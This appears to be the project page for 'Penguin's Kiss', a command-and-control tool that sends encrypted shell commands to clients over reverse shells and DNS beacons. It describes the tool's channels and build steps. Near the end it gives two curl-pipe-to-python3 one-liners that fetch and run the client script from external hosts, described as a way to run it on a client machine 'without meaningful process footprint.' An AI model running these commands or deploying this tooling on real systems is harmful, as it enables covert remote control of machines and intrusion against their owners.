Penguin's Kiss is command and control software designed to accomodate a large number of clients and controllers at once. Multiple channels are available for end-to-end encrypted delivery of shell commands, including direct TCP reverse shell, DNS beacon, and beacon-triggered direct connection. All information is sent encrypted, either by padded RSA or by one-time pad exchanged over RSA (this helps to keep short data snippets responsive and avoid ballooning message size). In the future, some work may be done to incorporate elliptic curve cryptography and one-time session keys utilizing some symmetric cipher (likely AES).
Downloading PK
The quickest way to download is via the button in the top right. This will take you to the latest release on GitHub. You can also clone the master (pseudo-stable) or develop (unstable) branches to receive feature updates before they are bundled into a full release.
Building PK
PK doesn't require much in the way of compilation, just bundling into a single script that can be distributed or run. This functionality is written in the makefile for easy access, so fetching and compilation should be as simple as:
# or tar -xzf pk.tgz if you've downloaded an archive git clone [email protected]:cflems/pk.git cd pk make
Your built artifacts will be pkcli.py
and pkd.py
.
Building is required before PK can be run for the first time.
Precompiled Client Scripts
Since cloning and building the latest version isn't the stealthiest procedure to execute on a client machine, prebuilt versions of the latest client script will be hosted in the several locations and can be executed without meaningful process footprint as follows:
curl -s https://dl.pkctl.org/pk.py | ENV=... python3 -
curl -s https://war.cflems.net/pk.py | ENV=... python3 -
You may wish to host your own, however, in order to tweak the default values to your needs and avoid feeding them via enviornment variables.